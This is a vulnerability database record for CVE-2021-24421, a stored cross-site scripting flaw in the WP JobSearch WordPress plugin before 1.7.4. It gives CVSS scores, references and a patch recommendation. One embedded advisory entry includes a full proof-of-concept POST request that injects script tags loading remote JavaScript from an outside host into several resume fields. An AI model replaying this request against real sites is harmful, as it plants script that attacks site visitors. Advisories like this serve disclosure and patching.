CVE-2021-24421

2021-07-12T20:15:00

Description

The WP JobSearch WordPress plugin before 1.7.4 did not sanitise or escape multiple of its parameters from the my-resume page before outputting them in the page, allowing low privilege users to use JavaScript payloads in them and leading to a Stored Cross-Site Scripting issue

Affected Software

CPE Name	Name	Version
eyecix:jobsearch_wp_job_board	eyecix jobsearch wp job board	1.7.4

{"id": "CVE-2021-24421", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-24421", "description": "The WP JobSearch WordPress plugin before 1.7.4 did not sanitise or escape multiple of its parameters from the my-resume page before outputting them in the page, allowing low privilege users to use JavaScript payloads in them and leading to a Stored Cross-Site Scripting issue", "published": "2021-07-12T20:15:00", "modified": "2021-07-15T14:55:00", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE", "baseScore": 3.5}, "severity": "LOW", "exploitabilityScore": 6.8, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 2.3, "impactScore": 2.7}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24421", "reporter": "contact@wpscan.com", "references": ["https://wpscan.com/vulnerability/b378d36d-66d9-4373-a628-e379e4766375", "https://m0ze.ru/vulnerability/[2021-05-19]-[WordPress]-[CWE-79]-WP-JobSearch-WordPress-Plugin-v1.7.3.txt"], "cvelist": ["CVE-2021-24421"], "immutableFields": [], "lastseen": "2023-02-09T14:11:21", "viewCount": 21, "enchantments": {"dependencies": {"references": [{"type": "cnvd", "idList": ["CNVD-2021-59597"]}, {"type": "patchstack", "idList": ["PATCHSTACK:3A162410AFA346C25FF9ACAB0488D969"]}, {"type": "wpexploit", "idList": ["WPEX-ID:B378D36D-66D9-4373-A628-E379E4766375"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:B378D36D-66D9-4373-A628-E379E4766375"]}]}, "score": {"value": 2.4, "vector": "NONE"}, "twitter": {"counter": 4, "modified": "2021-07-14T07:48:16", "tweets": [{"link": "https://twitter.com/www_sesin_at/status/1415715443457789952", "text": "New post from https://t.co/9KYxtdZjkl?amp=1 (CVE-2021-24421 (jobsearch_wp_job_board)) has been published on https://t.co/2R9NufIQ6C?amp=1"}, {"link": "https://twitter.com/www_sesin_at/status/1415715443457789952", "text": "New post from https://t.co/9KYxtdZjkl?amp=1 (CVE-2021-24421 (jobsearch_wp_job_board)) has been published on https://t.co/2R9NufIQ6C?amp=1"}, {"link": "https://twitter.com/WolfgangSesin/status/1415715426915471371", "text": "New post from https://t.co/uXvPWJy6tj?amp=1 (CVE-2021-24421 (jobsearch_wp_job_board)) has been published on https://t.co/0E484gncUT?amp=1"}, {"link": "https://twitter.com/WolfgangSesin/status/1415715426915471371", "text": "New post from https://t.co/uXvPWJy6tj?amp=1 (CVE-2021-24421 (jobsearch_wp_job_board)) has been published on https://t.co/0E484gncUT?amp=1"}]}, "backreferences": {"references": [{"type": "wpexploit", "idList": ["WPEX-ID:B378D36D-66D9-4373-A628-E379E4766375"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:B378D36D-66D9-4373-A628-E379E4766375"]}]}, "exploitation": null, "affected_software": {"major_version": [{"name": "eyecix jobsearch wp job board", "version": 1}]}, "epss": [{"cve": "CVE-2021-24421", "epss": "0.000580000", "percentile": "0.224540000", "modified": "2023-03-17"}], "vulnersScore": 2.4}, "_state": {"dependencies": 1675959320, "score": 1675960944, "affected_software_major_version": 1677351689, "epss": 1679098904}, "_internal": {"score_hash": "79f9da5fd2cceb6b79c769453d0afb51"}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": [], "cpe23": [], "cwe": ["CWE-79"], "affectedSoftware": [{"cpeName": "eyecix:jobsearch_wp_job_board", "version": "1.7.4", "operator": "lt", "name": "eyecix jobsearch wp job board"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:eyecix:jobsearch_wp_job_board:1.7.4:*:*:*:*:wordpress:*:*", "versionEndExcluding": "1.7.4", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://wpscan.com/vulnerability/b378d36d-66d9-4373-a628-e379e4766375", "name": "https://wpscan.com/vulnerability/b378d36d-66d9-4373-a628-e379e4766375", "refsource": "CONFIRM", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://m0ze.ru/vulnerability/[2021-05-19]-[WordPress]-[CWE-79]-WP-JobSearch-WordPress-Plugin-v1.7.3.txt", "name": "https://m0ze.ru/vulnerability/[2021-05-19]-[WordPress]-[CWE-79]-WP-JobSearch-WordPress-Plugin-v1.7.3.txt", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}], "product_info": [{"vendor": "Unknown", "product": "WP JobSearch"}]}

{"wpexploit": [{"lastseen": "2021-09-14T23:11:33", "description": "The plugin did not sanitise or escape multiple of its parameters from the my-resume page before outputting them in the page, allowing low privilege users to use JavaScript payloads in them and leading to a Stored Cross-Site Scripting issue\n", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 5.4, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-06-16T00:00:00", "type": "wpexploit", "title": "WP JobSearch < 1.7.4 - Authenticated Stored XSS", "bulletinFamily": "exploit", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24421"], "modified": "2021-06-29T14:12:50", "id": "WPEX-ID:B378D36D-66D9-4373-A628-E379E4766375", "href": "", "sourceData": "Vulnerable parameter(s): &jobsearch_field_education_title[]=, &jobsearch_field_education_academy[]=, &jobsearch_field_experience_company[]=, &jobsearch_field_portfolio_title[]=, &jobsearch_field_portfolio_vurl[]=, &jobsearch_field_portfolio_url[]=, &jobsearch_field_skill_title[]=, &jobsearch_field_lang_title[]=.\r\n\r\nPoC | Authenticated Persistent XSS | Candidate Profile:\r\n\r\nPOST /plugins/jobsearch/user-dashboard/?tab=my-resume HTTP/2\r\nCookie: [user cookies]\r\nUser-Agent: Mozilla/5.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 1612\r\n\r\njobsearch_field_resume_cover_letter=PoC&candidate_cover_file=&get_cand_skills%5B%5D=1553&jobsearch_field_education_title%5B%5D=<script+src%3d//m0ze.ru/payload/a.js></script>&jobsearch_field_education_start_date%5B%5D=May+29%2C+2021&jobsearch_field_education_end_date%5B%5D=&jobsearch_field_education_date_prsnt%5B%5D=on&jobsearch_field_education_academy%5B%5D=<script+src%3d//m0ze.ru/payload/a.js></script>&jobsearch_field_education_description%5B%5D=PoC&jobsearch_field_experience_title%5B%5D=1553&jobsearch_field_experience_start_date%5B%5D=May+29%2C+2021&jobsearch_field_experience_end_date%5B%5D=June+29%2C+2021&jobsearch_field_experience_date_prsnt%5B%5D=on&jobsearch_field_experience_company%5B%5D=<script+src%3d//m0ze.ru/payload/a.js></script>&jobsearch_field_experience_description%5B%5D=PoC&add_portfolio_img=&jobsearch_field_portfolio_title%5B%5D=\"><script+src%3d//m0ze.ru/payload/a.js></script><div%20&add_portfolio_img=&jobsearch_field_portfolio_image%5B%5D=921218418&jobsearch_field_portfolio_vurl%5B%5D=\"><script+src%3d//m0ze.ru/payload/a.js></script><div%20&jobsearch_field_portfolio_url%5B%5D=\"><script+src%3d//m0ze.ru/payload/a.js></script><div%20&jobsearch_field_skill_title%5B%5D=<script+src%3d//m0ze.ru/payload/a.js></script>&jobsearch_field_skill_percentage%5B%5D=88&jobsearch_field_lang_title%5B%5D=<script+src%3d//m0ze.ru/payload/a.js></script>&jobsearch_field_lang_level%5B%5D=proficient&jobsearch_field_lang_percentage%5B%5D=88&jobsearch_field_award_title%5B%5D=1553&jobsearch_field_award_year%5B%5D=2021&jobsearch_field_award_description%5B%5D=PoC&user_resume_form=1&terms_cond_check=on\r\n\r\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}], "wpvulndb": [{"lastseen": "2021-09-14T23:11:33", "description": "The plugin did not sanitise or escape multiple of its parameters from the my-resume page before outputting them in the page, allowing low privilege users to use JavaScript payloads in them and leading to a Stored Cross-Site Scripting issue\n\n### PoC\n\nVulnerable parameter(s): &jobsearch;_field_education_title[]=, &jobsearch;_field_education_academy[]=, &jobsearch;_field_experience_company[]=, &jobsearch;_field_portfolio_title[]=, &jobsearch;_field_portfolio_vurl[]=, &jobsearch;_field_portfolio_url[]=, &jobsearch;_field_skill_title[]=, &jobsearch;_field_lang_title[]=. PoC | Authenticated Persistent XSS | Candidate Profile: POST /plugins/jobsearch/user-dashboard/?tab=my-resume HTTP/2 Cookie: [user cookies] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 1612 jobsearch_field_resume_cover_letter=PoC&candidate;_cover_file=&get;_cand_skills%5B%5D=1553&jobsearch;_field_education_title%5B%5D=", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 5.4, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-06-16T00:00:00", "type": "wpvulndb", "title": "WP JobSearch < 1.7.4 - Authenticated Stored XSS", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24421"], "modified": "2021-06-29T14:12:50", "id": "WPVDB-ID:B378D36D-66D9-4373-A628-E379E4766375", "href": "https://wpscan.com/vulnerability/b378d36d-66d9-4373-a628-e379e4766375", "sourceData": "", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}], "patchstack": [{"lastseen": "2022-06-01T19:32:15", "description": "Authenticated Persistent Cross-Site Scripting (XSS) vulnerability discovered by m0ze in WordPress JobSearch premium plugin (versions <= 1.7.3).\n\n## Solution\n\n\r\n Update the WordPress JobSearch premium plugin to the latest available version (at least 1.7.4).\r\n ", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 5.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-05-19T00:00:00", "type": "patchstack", "title": "WordPress JobSearch premium plugin <= 1.7.3 - Authenticated Persistent Cross-Site Scripting (XSS) vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24421"], "modified": "2021-05-19T00:00:00", "id": "PATCHSTACK:3A162410AFA346C25FF9ACAB0488D969", "href": "https://patchstack.com/database/vulnerability/wp-jobsearch/wordpress-jobsearch-premium-plugin-1-7-3-authenticated-persistent-cross-site-scripting-xss-vulnerability", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}], "cnvd": [{"lastseen": "2022-11-05T10:44:50", "description": "WordPress is the Wordpress Foundation's set of blogging platforms developed using the PHP language. The platform supports the hosting of personal blogging sites on PHP and MySQL servers. WordPress plugin is a WordPress open source application plugin. a security vulnerability in versions prior to WP JobSearch WordPress plugin 1.7.4 stems from the plugin's failure to clean up or escape its multiple parameters from the \"\"my- resume\" page before exporting data to the page or escaping its multiple parameters, allowing a low-privileged user to use the JavaScript load in it and causing a cross-site scripting issue to be stored. No details of the vulnerability are currently available.", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 5.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-07-14T00:00:00", "type": "cnvd", "title": "WordPress plugin has an unspecified vulnerability (CNVD-2021-59597)", "bulletinFamily": "cnvd", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24421"], "modified": "2021-08-09T00:00:00", "id": "CNVD-2021-59597", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2021-59597", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}]}

CVE-2021-24421

Description

Affected Software

Related